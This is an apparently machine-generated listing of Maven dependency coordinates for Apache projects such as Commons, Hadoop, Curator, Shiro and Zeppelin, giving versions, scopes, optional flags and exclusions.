Opt|org.apache.commons:commons-vfs2@2.9.0 Opt MavenExclusions xerces:xerces,ant:ant-optional|commons-jxpath:commons-jxpath@1.3 Opt|xml-resolver:xml-resolver@1.2 Opt MavenExclusions org.springframework:spring-jcl|org.springframework:spring-core@5.3.33 Opt|org.springframework:spring-beans@5.3.33 Opt Scope provided|javax.servlet:servlet-api@2.5 Opt|org.yaml:snakeyaml@2.2 Opt|com.fasterxml.jackson.core:jackson-databind@2.17.0 Opt|org.apache.logging.log4j:log4j-1.2-api@2.23.1 Opt|org.apache.logging.log4j:log4j-core@2.23.1 org.apache.commons:commons-exec 1.3 org.apache.commons:commons-lang3 3.4 3.12.0 3.18.0 org.apache.commons:commons-math3 3.1.1 3.6.1 org.apache.commons:commons-parent 9 17 23 24 25 28 34 35 37 39 42 47 50 52 53 54 62 66 67 81 84 85 org.apache.commons:commons-pool2 2.3 Opt|cglib:cglib@3.1 Opt|org.ow2.asm:asm-util@5.0.3 org.apache.commons:commons-text 1.10.0 org.apache.commons:commons-lang3@3.12.0 org.apache.commons:commons-vfs2 2.6.0 commons-logging:commons-logging@1.2 Opt|ant:ant@1.6.5 Opt|commons-net:commons-net@3.6 
Opt|org.apache.commons:commons-compress@1.19 Opt|org.apache.commons:commons-collections4@4.4 org.apache.hadoop:hadoop-hdfs-client@3.2.1 Opt MavenExclusions *:*|org.apache.hadoop:hadoop-common@3.2.1 Opt MavenExclusions *:*|org.apache.hadoop:hadoop-hdfs@3.2.1 Opt|commons-httpclient:commons-httpclient@3.1 Opt|org.apache.httpcomponents:httpclient@4.5.10 Opt|org.apache.httpcomponents.client5:httpclient5@5.0-beta6 Opt|com.jcraft:jsch@0.1.55 2.10.0 commons-logging:commons-logging@1.3.4 Opt|commons-net:commons-net@3.11.1 Opt|org.apache.commons:commons-compress@1.27.1 Opt|org.apache.commons:commons-collections4@4.5.0-M3 Opt|commons-httpclient:commons-httpclient@3.1 Opt|org.apache.httpcomponents:httpclient@4.5.14 Opt|org.apache.httpcomponents.core5:httpcore5@5.3.3 Opt|org.apache.httpcomponents.client5:httpclient5@5.4.1 Opt|com.jcraft:jsch@0.1.55 org.apache.commons:commons-lang3@3.17.0 commons-io:commons-io@2.18.0 org.apache.commons:commons-vfs2-jackrabbit1 2.6.0 org.apache.commons:commons-vfs2@2.6.0 commons-logging:commons-logging@1.2 commons-httpclient:commons-httpclient@3.1 org.apache.httpcomponents:httpclient@4.5.10 org.apache.jackrabbit:jackrabbit-webdav@1.6.5 org.apache.commons:commons-vfs2-project 2.6.0 2.10.0 org.apache.curator:apache-curator 2.7.1 MavenExclusions com.sun.jmx:jmxri,com.sun.jdmk:jmxtools,javax.jms:jms,junit:junit,org.slf4j:slf4j-log4j12|org.apache.zookeeper:zookeeper@3.4.6 com.google.guava:guava@16.0.1 org.apache.curator:curator-client 2.7.1 org.slf4j:slf4j-api@1.7.6 MavenExclusions com.sun.jmx:jmxri,com.sun.jdmk:jmxtools,javax.jms:jms,junit:junit,org.slf4j:slf4j-log4j12|org.apache.zookeeper:zookeeper@3.4.6 com.google.guava:guava@16.0.1 org.apache.curator:curator-framework 2.7.1 org.apache.curator:curator-client@2.7.1 MavenExclusions com.sun.jmx:jmxri,com.sun.jdmk:jmxtools,javax.jms:jms,junit:junit,org.slf4j:slf4j-log4j12|org.apache.zookeeper:zookeeper@3.4.6 com.google.guava:guava@16.0.1 org.apache.curator:curator-recipes 2.7.1 
org.apache.curator:curator-framework@2.7.1 MavenExclusions com.sun.jmx:jmxri,com.sun.jdmk:jmxtools,javax.jms:jms,junit:junit,org.slf4j:slf4j-log4j12|org.apache.zookeeper:zookeeper@3.4.6 com.google.guava:guava@16.0.1 org.apache.directory.api:api-asn1-api 1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.api:api-asn1-ber 1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 org.apache.directory.api:api-asn1-api@1.0.0-M20 org.apache.directory.api:api-util@1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.api:api-asn1-parent 1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.api:api-i18n 1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.api:api-ldap-model 1.0.0-M20 org.apache.directory.api:api-util@1.0.0-M20 org.apache.directory.api:api-asn1-api@1.0.0-M20 org.apache.directory.api:api-asn1-ber@1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 org.apache.mina:mina-core@2.0.7 antlr:antlr@2.7.7 commons-lang:commons-lang@2.6 commons-collections:commons-collections@3.2.1 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 1.0.0-M31 org.apache.directory.api:api-util@1.0.0-M31 org.apache.directory.api:api-asn1-api@1.0.0-M31 org.apache.directory.api:api-asn1-ber@1.0.0-M31 org.apache.directory.api:api-i18n@1.0.0-M31 org.apache.mina:mina-core@2.0.9 Scope provided|antlr:antlr@2.7.7 org.apache.servicemix.bundles:org.apache.servicemix.bundles.antlr@2.7.7_5 commons-lang:commons-lang@2.6 commons-collections:commons-collections@3.2.1 Scope provided|findbugs:annotations@1.0.0 org.apache.directory.api:api-ldap-parent 1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 1.0.0-M31 org.apache.directory.api:api-parent 1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 1.0.0-M31 
org.apache.directory.api:api-util 1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.project:project 31 34 org.apache.directory.server:apacheds-i18n 2.0.0-M15 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.server:apacheds-kerberos-codec 2.0.0-M15 org.apache.directory.server:apacheds-i18n@2.0.0-M15 org.apache.directory.api:api-asn1-api@1.0.0-M20 org.apache.directory.api:api-asn1-ber@1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 org.apache.directory.api:api-ldap-model@1.0.0-M20 org.apache.directory.api:api-util@1.0.0-M20 net.sf.ehcache:ehcache-core@2.4.4 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.server:apacheds-parent 2.0.0-M15 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.hadoop:hadoop-annotations 2.7.7 Scope provided|jdiff:jdiff@1.0.9 org.apache.hadoop:hadoop-auth 2.7.7 Scope provided|org.apache.hadoop:hadoop-annotations@2.7.7 Scope provided|javax.servlet:servlet-api@2.5 org.slf4j:slf4j-api@1.7.10 commons-codec:commons-codec@1.4 Scope runtime MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 Scope runtime|org.slf4j:slf4j-log4j12@1.7.10 org.apache.httpcomponents:httpclient@4.2.5 MavenExclusions org.apache.directory.api:api-asn1-ber,org.apache.directory.api:api-i18n,org.apache.directory.api:api-ldap-model,net.sf.ehcache:ehcache-core|org.apache.directory.server:apacheds-kerberos-codec@2.0.0-M15 MavenExclusions junit:junit,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,org.jboss.netty:netty|org.apache.zookeeper:zookeeper@3.4.6 org.apache.curator:curator-framework@2.7.1 org.apache.hadoop:hadoop-client-api 3.2.4 org.apache.hadoop:hadoop-client-runtime 3.2.4 Scope runtime|org.apache.hadoop:hadoop-client-api@3.2.4 Scope runtime|org.apache.htrace:htrace-core4@4.1.0-incubating Scope 
runtime|org.slf4j:slf4j-api@1.7.35 Scope runtime MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:javax.servlet-api|commons-logging:commons-logging@1.1.3 Scope runtime|com.google.code.findbugs:jsr305@3.0.2 Opt Scope runtime MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|ch.qos.reload4j:reload4j@1.2.18.3 org.apache.hadoop:hadoop-common 2.7.7 org.apache.hadoop:hadoop-annotations@2.7.7 com.google.guava:guava@11.0.2 commons-cli:commons-cli@1.2 org.apache.commons:commons-math3@3.1.1 xmlenc:xmlenc@0.52 commons-httpclient:commons-httpclient@3.1 commons-codec:commons-codec@1.4 commons-io:commons-io@2.4 commons-net:commons-net@3.1 commons-collections:commons-collections@3.2.2 javax.servlet:servlet-api@2.5 MavenExclusions org.mortbay.jetty:servlet-api|org.mortbay.jetty:jetty@6.1.26 org.mortbay.jetty:jetty-util@6.1.26 org.mortbay.jetty:jetty-sslengine@6.1.26 Scope runtime|javax.servlet.jsp:jsp-api@2.1 com.sun.jersey:jersey-core@1.9 MavenExclusions stax:stax-api|com.sun.jersey:jersey-json@1.9 com.sun.jersey:jersey-server@1.9 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 net.java.dev.jets3t:jets3t@0.9.0 commons-lang:commons-lang@2.6 commons-configuration:commons-configuration@1.6 org.slf4j:slf4j-api@1.7.10 Scope runtime|org.slf4j:slf4j-log4j12@1.7.10 org.codehaus.jackson:jackson-core-asl@1.9.13 org.codehaus.jackson:jackson-mapper-asl@1.9.13 org.apache.avro:avro@1.7.4 Scope provided|org.apache.ant:ant@1.8.1 com.google.protobuf:protobuf-java@2.5.0 com.google.code.gson:gson@2.2.4 org.apache.hadoop:hadoop-auth@2.7.7 com.jcraft:jsch@0.1.54 org.apache.curator:curator-client@2.7.1 org.apache.curator:curator-recipes@2.7.1 com.google.code.findbugs:jsr305@3.0.0 org.apache.htrace:htrace-core@3.1.0-incubating 
MavenExclusions jline:jline,org.jboss.netty:netty,junit:junit,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.zookeeper:zookeeper@3.4.6 org.apache.commons:commons-compress@1.4.1 org.apache.hadoop:hadoop-hdfs 2.7.7 Scope provided|org.apache.hadoop:hadoop-annotations@2.7.7 Scope provided|org.apache.hadoop:hadoop-auth@2.7.7 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 com.google.guava:guava@11.0.2 MavenExclusions org.mortbay.jetty:servlet-api|org.mortbay.jetty:jetty@6.1.26 org.mortbay.jetty:jetty-util@6.1.26 com.sun.jersey:jersey-core@1.9 com.sun.jersey:jersey-server@1.9 commons-cli:commons-cli@1.2 commons-codec:commons-codec@1.4 commons-io:commons-io@2.4 commons-lang:commons-lang@2.6 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 commons-daemon:commons-daemon@1.0.13 MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 com.google.protobuf:protobuf-java@2.5.0 javax.servlet:servlet-api@2.5 Scope provided|org.slf4j:slf4j-log4j12@1.7.10 org.codehaus.jackson:jackson-core-asl@1.9.13 org.codehaus.jackson:jackson-mapper-asl@1.9.13 xmlenc:xmlenc@0.52 io.netty:netty@3.6.2.Final io.netty:netty-all@4.0.23.Final xerces:xercesImpl@2.9.1 org.apache.htrace:htrace-core@3.1.0-incubating org.fusesource.leveldbjni:leveldbjni-all@1.8 org.apache.hadoop:hadoop-main 2.7.7 3.2.4 org.apache.hadoop:hadoop-project 2.7.7 3.2.4 org.apache.hadoop:hadoop-project-dist 2.7.7 Scope provided|org.apache.hadoop:hadoop-annotations@2.7.7 org.apache.hadoop:hadoop-yarn 2.7.7 org.apache.hadoop:hadoop-yarn-api 2.7.7 commons-lang:commons-lang@2.6 com.google.guava:guava@11.0.2 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 org.apache.hadoop:hadoop-annotations@2.7.7 com.google.protobuf:protobuf-java@2.5.0 
org.apache.hadoop:hadoop-yarn-client 2.7.7 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 com.google.guava:guava@11.0.2 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 commons-lang:commons-lang@2.6 commons-cli:commons-cli@1.2 MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 org.apache.hadoop:hadoop-annotations@2.7.7 org.apache.hadoop:hadoop-yarn-api@2.7.7 org.apache.hadoop:hadoop-yarn-common@2.7.7 org.apache.hadoop:hadoop-yarn-common 2.7.7 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 org.apache.hadoop:hadoop-yarn-api@2.7.7 javax.xml.bind:jaxb-api@2.2.2 org.apache.commons:commons-compress@1.4.1 commons-lang:commons-lang@2.6 javax.servlet:servlet-api@2.5 commons-codec:commons-codec@1.4 org.mortbay.jetty:jetty-util@6.1.26 com.sun.jersey:jersey-core@1.9 com.sun.jersey:jersey-client@1.9 org.codehaus.jackson:jackson-core-asl@1.9.13 org.codehaus.jackson:jackson-mapper-asl@1.9.13 org.codehaus.jackson:jackson-jaxrs@1.9.13 org.codehaus.jackson:jackson-xc@1.9.13 com.google.guava:guava@11.0.2 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 commons-cli:commons-cli@1.2 org.slf4j:slf4j-api@1.7.10 org.apache.hadoop:hadoop-annotations@2.7.7 com.google.inject.extensions:guice-servlet@3.0 com.google.protobuf:protobuf-java@2.5.0 commons-io:commons-io@2.4 com.google.inject:guice@3.0 com.sun.jersey:jersey-server@1.9 MavenExclusions stax:stax-api|com.sun.jersey:jersey-json@1.9 com.sun.jersey.contribs:jersey-guice@1.9 MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 org.apache.hadoop:hadoop-yarn-server-tests 2.7.7 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 org.apache.hadoop:hadoop-annotations@2.7.7 org.apache.hadoop:hadoop-yarn-server-common@2.7.7 
org.apache.hadoop:hadoop-yarn-server-nodemanager@2.7.7 org.apache.hadoop:hadoop-yarn-server-resourcemanager@2.7.7 org.apache.hadoop:hadoop-yarn-common@2.7.7 org.apache.hadoop:hadoop-yarn-api@2.7.7 com.google.guava:guava@11.0.2 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 org.apache.htrace:htrace 3.1.0-incubating 4.1.0-incubating org.apache.htrace:htrace-core 3.1.0-incubating org.apache.htrace:htrace-core4 4.1.0-incubating org.apache.httpcomponents:httpasyncclient 4.0.2 org.apache.httpcomponents:httpcore@4.3.2 org.apache.httpcomponents:httpcore-nio@4.3.2 org.apache.httpcomponents:httpclient@4.3.5 commons-logging:commons-logging@1.1.3 org.apache.httpcomponents:httpclient 4.5.1 org.apache.httpcomponents:httpcore@4.4.3 commons-logging:commons-logging@1.2 commons-codec:commons-codec@1.9 4.5.13 org.apache.httpcomponents:httpcore@4.4.13 commons-logging:commons-logging@1.2 commons-codec:commons-codec@1.11 org.apache.httpcomponents:httpcomponents-asyncclient 4.0.2 org.apache.httpcomponents:httpcomponents-client 4.5 4.5.1 4.5.11 4.5.13 org.apache.httpcomponents:httpcomponents-core 4.3.2 4.4.1 4.4.3 4.4.13 org.apache.httpcomponents:httpcomponents-parent 11 org.apache.httpcomponents:httpcore 4.4.1 4.4.3 4.4.13 org.apache.httpcomponents:httpcore-nio 4.3.2 org.apache.httpcomponents:httpcore@4.3.2 org.apache.httpcomponents:httpmime 4.5 org.apache.httpcomponents:httpclient@4.5 4.5.11 org.apache.httpcomponents:httpclient@4.5.11 org.apache.httpcomponents:project 7 org.apache.jackrabbit:jackrabbit-jcr-commons 1.6.5 Scope provided|javax.jcr:jcr@1.0 2.22.2 Scope provided|javax.jcr:jcr@2.0 Opt|org.apache.jackrabbit:oak-jackrabbit-api@1.22.22 Scope provided|org.osgi:org.osgi.annotation@6.0.0 org.apache.jackrabbit:jackrabbit-parent 1.6.5 2.22.2 org.apache.jackrabbit:jackrabbit-webdav 1.6.5 org.apache.jackrabbit:jackrabbit-jcr-commons@1.6.5 org.slf4j:slf4j-api@1.5.3 Scope 
provided|javax.servlet:servlet-api@2.3 MavenExclusions junit:junit|commons-httpclient:commons-httpclient@3.0 org.apache.jackrabbit:parent 5 org.apache.logging.log4j:log4j-bom 2.24.3 org.apache.logging:logging-parent 11.3.0 org.apache.lucene:lucene-analyzers-common 8.7.0 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-core 8.7.0 org.apache.lucene:lucene-highlighter 8.7.0 org.apache.lucene:lucene-core@8.7.0 MavenExclusions org.apache.lucene:lucene-core|org.apache.lucene:lucene-memory@8.7.0 MavenExclusions org.apache.lucene:lucene-core|org.apache.lucene:lucene-queries@8.7.0 org.apache.lucene:lucene-memory 8.7.0 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-parent 8.7.0 org.apache.lucene:lucene-queries 8.7.0 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-queryparser 8.7.0 org.apache.lucene:lucene-core@8.7.0 MavenExclusions org.apache.lucene:lucene-core|org.apache.lucene:lucene-queries@8.7.0 MavenExclusions org.apache.lucene:lucene-core|org.apache.lucene:lucene-sandbox@8.7.0 org.apache.lucene:lucene-sandbox 8.7.0 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-solr-grandparent 8.7.0 org.apache.maven.plugin-tools:maven-plugin-annotations 3.7.0 org.apache.maven.resolver:maven-resolver 1.4.1 org.apache.maven.resolver:maven-resolver-api 1.4.1 org.apache.maven.resolver:maven-resolver-connector-basic 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 org.apache.maven.resolver:maven-resolver-util@1.4.1 Opt Scope provided|javax.inject:javax.inject@1 org.slf4j:slf4j-api@1.7.25 org.apache.maven.resolver:maven-resolver-impl 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 org.apache.maven.resolver:maven-resolver-util@1.4.1 Opt Scope provided|javax.inject:javax.inject@1 Opt Scope provided|org.eclipse.sisu:org.eclipse.sisu.inject@0.3.3 Opt Scope provided MavenClassifier no_aop MavenExclusions 
aopalliance:aopalliance,com.google.code.findbugs:jsr305|org.sonatype.sisu:sisu-guice@3.2.6 org.slf4j:slf4j-api@1.7.25 org.apache.maven.resolver:maven-resolver-spi 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-transport-file 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 Opt Scope provided|javax.inject:javax.inject@1 org.slf4j:slf4j-api@1.7.25 org.apache.maven.resolver:maven-resolver-transport-http 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 org.apache.maven.resolver:maven-resolver-util@1.4.1 MavenExclusions commons-logging:commons-logging|org.apache.httpcomponents:httpclient@4.5.6 org.apache.httpcomponents:httpcore@4.4.10 Scope runtime|org.slf4j:jcl-over-slf4j@1.7.25 Opt Scope provided|javax.inject:javax.inject@1 org.slf4j:slf4j-api@1.7.25 org.apache.maven.resolver:maven-resolver-util 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven:maven 3.6.3 org.apache.maven:maven-artifact 3.6.3 org.codehaus.plexus:plexus-utils@3.2.1 org.apache.commons:commons-lang3@3.8.1 org.apache.maven:maven-builder-support 3.6.3 org.apache.maven:maven-model 3.6.3 org.codehaus.plexus:plexus-utils@3.2.1 org.apache.maven:maven-model-builder 3.6.3 org.codehaus.plexus:plexus-utils@3.2.1 org.codehaus.plexus:plexus-interpolation@1.25 javax.inject:javax.inject@1 org.apache.maven:maven-model@3.6.3 org.apache.maven:maven-artifact@3.6.3 org.apache.maven:maven-builder-support@3.6.3 org.eclipse.sisu:org.eclipse.sisu.inject@0.3.4 org.apache.maven:maven-parent 33 org.apache.maven:maven-plugin-api 3.6.3 org.apache.maven:maven-model@3.6.3 MavenExclusions org.apache.maven.wagon:wagon-provider-api|org.apache.maven:maven-artifact@3.6.3 org.eclipse.sisu:org.eclipse.sisu.plexus@0.3.4 org.codehaus.plexus:plexus-utils@3.2.1 org.codehaus.plexus:plexus-classworlds@2.6.0 org.apache.maven:maven-repository-metadata 3.6.3 
org.codehaus.plexus:plexus-utils@3.2.1 org.apache.maven:maven-resolver-provider 3.6.3 org.apache.maven:maven-model@3.6.3 org.apache.maven:maven-model-builder@3.6.3 org.apache.maven:maven-repository-metadata@3.6.3 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 org.apache.maven.resolver:maven-resolver-util@1.4.1 org.apache.maven.resolver:maven-resolver-impl@1.4.1 org.codehaus.plexus:plexus-utils@3.2.1 javax.inject:javax.inject@1 Opt MavenClassifier no_aop MavenExclusions aopalliance:aopalliance|com.google.inject:guice@4.2.1 org.slf4j:slf4j-api@1.7.29 org.apache.mina:mina-core 2.0.7 org.slf4j:slf4j-api@1.6.6 2.0.9 org.slf4j:slf4j-api@1.7.7 2.0.21 org.slf4j:slf4j-api@1.7.26 2.0.22 org.slf4j:slf4j-api@1.7.26 2.0.27 org.slf4j:slf4j-api@1.7.36 org.apache.mina:mina-parent 2.0.7 org.slf4j:slf4j-api@1.6.6 2.0.9 org.slf4j:slf4j-api@1.7.7 2.0.21 org.slf4j:slf4j-api@1.7.26 2.0.22 org.slf4j:slf4j-api@1.7.26 2.0.27 org.slf4j:slf4j-api@1.7.36 org.apache.pdfbox:fontbox 2.0.16 commons-logging:commons-logging@1.2 2.0.23 commons-logging:commons-logging@1.2 2.0.24 commons-logging:commons-logging@1.2 org.apache.pdfbox:pdfbox 2.0.16 org.apache.pdfbox:fontbox@2.0.16 commons-logging:commons-logging@1.2 Opt|org.bouncycastle:bcmail-jdk15on@1.60 Opt|org.bouncycastle:bcprov-jdk15on@1.60 2.0.23 org.apache.pdfbox:fontbox@2.0.23 commons-logging:commons-logging@1.2 Opt|org.bouncycastle:bcmail-jdk15on@1.64 Opt|org.bouncycastle:bcprov-jdk15on@1.64 2.0.24 org.apache.pdfbox:fontbox@2.0.24 commons-logging:commons-logging@1.2 Opt|org.bouncycastle:bcmail-jdk15on@1.64 Opt|org.bouncycastle:bcprov-jdk15on@1.64 org.apache.pdfbox:pdfbox-parent 2.0.16 2.0.23 2.0.24 org.apache.pdfbox:xmpbox 2.0.16 commons-logging:commons-logging@1.2 org.apache.servicemix.bundles:bundles-pom 6 org.apache.servicemix.bundles:org.apache.servicemix.bundles.antlr 2.7.7_5 org.apache.servicemix:servicemix-pom 5 org.apache.shiro:shiro-cache 1.10.0 org.apache.shiro:shiro-lang@1.10.0 
1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-config 1.10.0 1.13.0 org.apache.shiro:shiro-config-core 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-config-ogdl 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-config-core@1.10.0 org.apache.shiro:shiro-event@1.10.0 MavenExclusions commons-logging:commons-logging|commons-beanutils:commons-beanutils@1.9.4 Opt MavenExclusions commons-logging:commons-logging|org.apache.commons:commons-configuration2@2.8.0 org.slf4j:slf4j-api@1.7.36 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-config-core@1.13.0 org.apache.shiro:shiro-event@1.13.0 MavenExclusions commons-logging:commons-logging|commons-beanutils:commons-beanutils@1.9.4 Opt MavenExclusions commons-logging:commons-logging|org.apache.commons:commons-configuration2@2.9.0 org.slf4j:slf4j-api@1.7.36 org.apache.shiro:shiro-core 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-cache@1.10.0 org.apache.shiro:shiro-crypto-hash@1.10.0 org.apache.shiro:shiro-crypto-cipher@1.10.0 org.apache.shiro:shiro-config-core@1.10.0 org.apache.shiro:shiro-config-ogdl@1.10.0 org.apache.shiro:shiro-event@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-cache@1.13.0 org.apache.shiro:shiro-crypto-hash@1.13.0 org.apache.shiro:shiro-crypto-cipher@1.13.0 org.apache.shiro:shiro-config-core@1.13.0 org.apache.shiro:shiro-config-ogdl@1.13.0 org.apache.shiro:shiro-event@1.13.0 org.apache.shiro:shiro-crypto 1.10.0 1.13.0 org.apache.shiro:shiro-crypto-cipher 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-crypto-core@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-crypto-core@1.13.0 org.apache.shiro:shiro-crypto-core 1.10.0 org.apache.shiro:shiro-lang@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-crypto-hash 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-crypto-core@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 
org.apache.shiro:shiro-crypto-core@1.13.0 org.apache.shiro:shiro-event 1.10.0 org.apache.shiro:shiro-lang@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-lang 1.10.0 org.slf4j:slf4j-api@1.7.36 1.13.0 org.slf4j:slf4j-api@1.7.36 org.apache.shiro:shiro-root 1.10.0 1.12.0 1.13.0 org.apache.shiro:shiro-web 1.10.0 org.apache.shiro:shiro-core@1.10.0 Scope provided|javax.servlet.jsp:jsp-api@2.2 Scope provided|org.apache.taglibs:taglibs-standard-spec@1.2.5 Scope provided|org.apache.taglibs:taglibs-standard-impl@1.2.5 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.owasp.encoder:encoder@1.2.3 1.12.0 org.apache.shiro:shiro-core@1.12.0 Scope provided|javax.servlet.jsp:jsp-api@2.2 Scope provided|org.apache.taglibs:taglibs-standard-spec@1.2.5 Scope provided|org.apache.taglibs:taglibs-standard-impl@1.2.5 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.owasp.encoder:encoder@1.2.3 1.13.0 org.apache.shiro:shiro-core@1.13.0 Scope provided|javax.servlet.jsp:jsp-api@2.2 Scope provided|org.apache.taglibs:taglibs-standard-spec@1.2.5 Scope provided|org.apache.taglibs:taglibs-standard-impl@1.2.5 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.owasp.encoder:encoder@1.2.3 org.apache.taglibs:taglibs-parent 3 org.apache.taglibs:taglibs-standard 1.2.5 org.apache.taglibs:taglibs-standard-impl 1.2.5 Scope provided|org.apache.taglibs:taglibs-standard-spec@1.2.5 Scope provided|javax.servlet:servlet-api@2.5 Scope provided|javax.servlet.jsp:jsp-api@2.1 Scope provided|javax.el:el-api@1.0 Opt Scope provided|xalan:xalan@2.7.1 org.apache.taglibs:taglibs-standard-spec 1.2.5 Scope provided|javax.servlet:servlet-api@2.5 Scope provided|javax.servlet.jsp:jsp-api@2.1 Scope provided|javax.el:el-api@1.0 org.apache.thrift:libthrift 0.13.0 org.slf4j:slf4j-api@1.7.25 org.apache.httpcomponents:httpclient@4.5.6 org.apache.httpcomponents:httpcore@4.4.1 Scope provided|javax.servlet:servlet-api@2.5 javax.annotation:javax.annotation-api@1.3.2 0.14.0 
org.slf4j:slf4j-api@1.7.28 org.apache.httpcomponents:httpclient@4.5.10 org.apache.httpcomponents:httpcore@4.4.12 org.apache.tomcat.embed:tomcat-embed-core@8.5.46 javax.annotation:javax.annotation-api@1.3.2 org.apache.tomcat.embed:tomcat-embed-core 8.5.46 org.apache.tomcat:tomcat-annotations-api@8.5.46 9.0.106 org.apache.tomcat:tomcat-annotations-api@9.0.106 9.0.110 org.apache.tomcat:tomcat-annotations-api@9.0.110 org.apache.tomcat:tomcat-annotations-api 8.5.46 9.0.106 9.0.110 org.apache.zeppelin:zeppelin 0.11.1 0.12.0 org.apache.zeppelin:zeppelin-common 0.11.1 com.google.code.gson:gson@2.8.9 org.slf4j:slf4j-api@1.7.35 org.apache.zeppelin:zeppelin-interpreter 0.11.1 org.apache.zeppelin:zeppelin-common@0.11.1 MavenExclusions org.apache.commons:commons-lang3|io.atomix:atomix@3.0.0-rc5 io.atomix:atomix-raft@3.0.0-rc5 io.atomix:atomix-primary-backup@3.0.0-rc5 org.apache.commons:commons-lang3@3.12.0 MavenExclusions commons-logging:commons-logging|org.apache.thrift:libthrift@0.13.0 com.google.code.gson:gson@2.8.9 MavenExclusions commons-logging:commons-logging|org.apache.commons:commons-configuration2@2.8.0 MavenExclusions commons-logging:commons-logging|commons-beanutils:commons-beanutils@1.9.4 org.apache.commons:commons-exec@1.3 org.apache.commons:commons-pool2@2.3 commons-io:commons-io@2.7 MavenExclusions ch.qos.reload4j:reload4j|org.slf4j:slf4j-reload4j@1.7.35 